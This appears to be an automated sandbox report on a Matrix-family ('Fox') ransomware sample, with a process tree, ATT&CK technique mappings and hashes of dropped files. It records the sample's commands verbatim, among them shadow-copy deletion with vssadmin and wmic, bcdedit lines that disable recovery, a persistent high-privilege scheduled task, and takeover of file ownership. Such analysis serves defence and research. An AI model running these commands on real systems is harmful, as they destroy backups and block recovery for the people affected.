PID 1016 wrote to memory of 4532	1016	cmd.exe	powershell.exe
PID 2076 wrote to memory of 3696	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 3696	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 3696	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 3480	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 3480	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 3480	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 3696 wrote to memory of 1276	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1276	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1276	3696	cmd.exe	reg.exe
PID 3480 wrote to memory of 5024	3480	cmd.exe	wscript.exe
PID 3480 wrote to memory of 5024	3480	cmd.exe	wscript.exe
PID 3480 wrote to memory of 5024	3480	cmd.exe	wscript.exe
PID 2076 wrote to memory of 2704	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 2704	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 2076 wrote to memory of 2704	2076	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 3696 wrote to memory of 5560	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 5560	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 5560	3696	cmd.exe	reg.exe
PID 2704 wrote to memory of 4404	2704	cmd.exe	attrib.exe
PID 2704 wrote to memory of 4404	2704	cmd.exe	attrib.exe
PID 2704 wrote to memory of 4404	2704	cmd.exe	attrib.exe
PID 3696 wrote to memory of 5932	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 5932	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 5932	3696	cmd.exe	reg.exe
PID 2704 wrote to memory of 3672	2704	cmd.exe	cacls.exe
PID 2704 wrote to memory of 3672	2704	cmd.exe	cacls.exe
PID 2704 wrote to memory of 3672	2704	cmd.exe	cacls.exe
PID 2704 wrote to memory of 6468	2704	cmd.exe	takeown.exe
PID 2704 wrote to memory of 6468	2704	cmd.exe	takeown.exe
PID 2704 wrote to memory of 6468	2704	cmd.exe	takeown.exe
PID 2704 wrote to memory of 6560	2704	cmd.exe	cmd.exe
PID 2704 wrote to memory of 6560	2704	cmd.exe	cmd.exe
PID 2704 wrote to memory of 6560	2704	cmd.exe	cmd.exe
PID 6560 wrote to memory of 6896	6560	cmd.exe	Mk0Uxuuz.exe
PID 6560 wrote to memory of 6896	6560	cmd.exe	Mk0Uxuuz.exe
PID 6560 wrote to memory of 6896	6560	cmd.exe	Mk0Uxuuz.exe
PID 6896 wrote to memory of 5280	6896	Mk0Uxuuz.exe	Mk0Uxuuz64.exe
PID 6896 wrote to memory of 5280	6896	Mk0Uxuuz.exe	Mk0Uxuuz64.exe
PID 5024 wrote to memory of 7104	5024	wscript.exe	cmd.exe
PID 5024 wrote to memory of 7104	5024	wscript.exe	cmd.exe
PID 5024 wrote to memory of 7104	5024	wscript.exe	cmd.exe
PID 7104 wrote to memory of 5460	7104	cmd.exe	schtasks.exe
PID 7104 wrote to memory of 5460	7104	cmd.exe	schtasks.exe
PID 7104 wrote to memory of 5460	7104	cmd.exe	schtasks.exe
PID 5024 wrote to memory of 6976	5024	wscript.exe	cmd.exe
PID 5024 wrote to memory of 6976	5024	wscript.exe	cmd.exe
PID 5024 wrote to memory of 6976	5024	wscript.exe	cmd.exe
PID 6976 wrote to memory of 6428	6976	cmd.exe	schtasks.exe
PID 6976 wrote to memory of 6428	6976	cmd.exe	schtasks.exe
PID 6976 wrote to memory of 6428	6976	cmd.exe	schtasks.exe
PID 6796 wrote to memory of 6164	6796	cmd.exe	vssadmin.exe
PID 6796 wrote to memory of 6164	6796	cmd.exe	vssadmin.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4404 attrib.exe

pid	process
4404	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2076
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWEyBzO5.exe"
  2⤵
  PID:2456
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWEyBzO5.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWEyBzO5.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\WBkBavWG.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1016
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4532
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\cJdLE5tu.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3696
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\cJdLE5tu.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:5560
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:5932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\RLXR0BvJ.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\RLXR0BvJ.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5024
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wtdI05uJ.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:7104
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wtdI05uJ.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:5460
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:6976
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:6428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\z3FgIkjx.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    - Views/modifies file attributes
    PID:4404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    - Modifies file permissions
    PID:6468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mk0Uxuuz.exe -accepteula "ActivitiesCache.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Mk0Uxuuz.exe
      Mk0Uxuuz.exe -accepteula "ActivitiesCache.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:6896
    - - C:\Users\Admin\AppData\Local\Temp\Mk0Uxuuz64.exe
        
        Mk0Uxuuz.exe -accepteula "ActivitiesCache.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5280

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wtdI05uJ.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:6796
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:6164
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6788
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:6788
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5988
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:3768

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3045580317-3728985860-206385570-1000\desktop.ini

Filesize
1KB

MD5
29197d129a14673e54e4425646f3022a

SHA1
f5e72460b7e7e7cccc6f392c17fb1047a37e549f

SHA256
ab93d0c1c3fccf47ed09a4f42391eb5c14acad1f0753c7bf524a90ba319e3bc8

SHA512
1dc5936f18fe538839da85d95e9717388de30b0298092b9892a6216c15be305e9e5bc49117f1550fac067f5a4d5b145e6c12c3af6a3032920fd7c241b7bd323b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf

Filesize
8KB

MD5
11a9d433d06d0f938066a4000e25e541

SHA1
739c39950a9f320a3c6409ae0ddadbcdcefacc58

SHA256
95b43b70310434908825ae1e34c347de713fbe3f2c16f06517ee9771f0c76f48

SHA512
944c16e5f8e1e0c6a90d39942dbbb1eb32383704b5728c9d758cf05a1555e7bd2c4e39df97bac47465d19a54368b7fcafbe58e2dc7813325b5598cb43b72b422

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\[[email protected] ].eZwZyCFk-t92YbK8O.FOX

Filesize
3.3MB

MD5
bf7a3ae49f91721db6bd91ac1b347a4f

SHA1
d0f5e3d883dbdfc5dde31e98af64261a0a9002f1

SHA256
d115263266cc7a379bc30e10a3c411bae5eaea519c00f3fa010ec5084c90f7b1

SHA512
30f2e450449fe47c31fa52a71deaccccb7bfbb700f4beaaac5bd8486a2ff5b92f65bf9ff867e340bd9bccb03b183cb25ebe394473cf644b4aef1f4581d669516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
415658e16e9c66ebffc0c22d5f1e6a2e

SHA1
00fb7b877053a6aef21158e400793b0e5352b558

SHA256
50acba73ab6ee6365a46a078ac2ee1e86e76561bed2d8c5b0a09bcd4d47c16da

SHA512
d2ed404f5f73cb68e6f991ed6aaaa182a7596a2910290863eec061a697f288f454ebbf42802f39802b659e2b8c44e84281f2745dbbd1280cd21a368466c28415

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Mk0Uxuuz.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWEyBzO5.exe

Filesize
1.2MB

MD5
1fa1b6d4b3ed867c1d4baffc77417611

SHA1
afb5e385f9cc8910d7a970b6c32b8d79295579da

SHA256
91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53

SHA512
0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\WBkBavWG.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_09F971054C2D71EA.txt

Filesize
32KB

MD5
898d81e226b41cb47fabc408443e0338

SHA1
67de1d0da21eec206ac8c21c4659addee3690bef

SHA256
c6db6eb585e55243236032a5b6ade489248c1cb0ed04d85b8996f31b80c3e8d8

SHA512
d479dcadd6a6ed278343cc0ec950a21fa6531cac03c552d0a01a0e0eae94b828e9055491dfec9e730a0daed70c486f79ec1c6dac38edb98a80e141ea99886eae

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_09F971054C2D71EA.txt

Filesize
591B

MD5
dc30f03284328b5227e10e7bd795aef3

SHA1
b72b212dc51b89dfc3ea129c34a357375c7207a8

SHA256
8b7698201dff4a9d65468bae4103069c8a173198a9c20f18878c56e040e7dfe6

SHA512
3c51f57360a8708c18f528da3ac826577968b4fc625e6b33071515fc81eeedbc0786b8d288c2f2dd849c250aac043f1a5aeed34fb9b19c1d36914c1a970c6480

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\z3FgIkjx.bat

Filesize
246B

MD5
db4de08176d3c870185b8dab1e25c083

SHA1
6a5953db6dc0ccff676cf2834003f0dc7864fa67

SHA256
ad276f5c6ecff9fa59fcf3d3d2009002ff8b57fa7f4bb982245c4684e9c2cb32

SHA512
f02d9caaa40da4b8c9dd532e776bb18155bf74c50cd8a51cdf3d60f2c610977f5dd8209d06a44852ef376aadfd7f503cc683492c76e27fa89aa7e2146d728738

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mk0Uxuuz64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ietx3bxw.3zh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\RLXR0BvJ.vbs

Filesize
260B

MD5
4b8052ed90f7a87f8e29bae6a6a96aaa

SHA1
915192cab105c84831e63139a66220f9c897cbd8

SHA256
a710431e31026b0653ea937f899758d2b276be2551e566a21b109cfa3f4c39f5

SHA512
190da666748ccc0cc7a88dd1fcfe0739e0a83c48065e3d426f5641710d564280f199719789e77ff88536e619c436dbcadee9dddda9270efc3a650a815efdb6e4

Download Submit
C:\Users\Admin\AppData\Roaming\wtdI05uJ.bat

Filesize
265B

MD5
0b7b3aaceed9e94fbd2cab73a9a176da

SHA1
b9c244fc06935d0adfd8bd16b28bf1942783ae33

SHA256
66e3a9ca6dde5bacbfd3585fd33931ed0fe6699f0e296233968ff191e4026ca5

SHA512
2dc6e2b98855130bfaf6f5e9c77c16df7cdcec32da885572dc45fb6e191f1a7c699c63e8c8a4854d38d4ba1cd3d02104c858818957fb1939a955a3d12d4677e4

Download Submit
memory/2076-26-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2076-24368-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2076-19742-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2076-13665-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/2076-5311-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3884-24384-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3884-13998-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3884-27-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3884-24409-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3884-24421-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3884-24444-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/4532-30-0x0000000006C40000-0x0000000006C5A000-memory.dmp

Filesize
104KB

Download
memory/4532-8-0x0000000073AD0000-0x0000000074280000-memory.dmp

Filesize
7.7MB

Download
memory/4532-10-0x0000000005830000-0x0000000005E58000-memory.dmp

Filesize
6.2MB

Download
memory/4532-11-0x0000000005EC0000-0x0000000005EE2000-memory.dmp

Filesize
136KB

Download
memory/4532-23-0x0000000006130000-0x0000000006484000-memory.dmp

Filesize
3.3MB

Download
memory/4532-9-0x0000000002E30000-0x0000000002E40000-memory.dmp

Filesize
64KB

Download
memory/4532-12-0x0000000005F60000-0x0000000005FC6000-memory.dmp

Filesize
408KB

Download
memory/4532-13-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/4532-7-0x00000000051C0000-0x00000000051F6000-memory.dmp

Filesize
216KB

Download
memory/4532-33-0x0000000073AD0000-0x0000000074280000-memory.dmp

Filesize
7.7MB

Download
memory/4532-24-0x0000000006770000-0x000000000678E000-memory.dmp

Filesize
120KB

Download
memory/4532-29-0x0000000007DC0000-0x000000000843A000-memory.dmp

Filesize
6.5MB

Download
memory/4532-28-0x0000000002E30000-0x0000000002E40000-memory.dmp

Filesize
64KB

Download
memory/4532-25-0x0000000006790000-0x00000000067DC000-memory.dmp

Filesize
304KB

Download
memory/6896-2776-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6896-10525-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download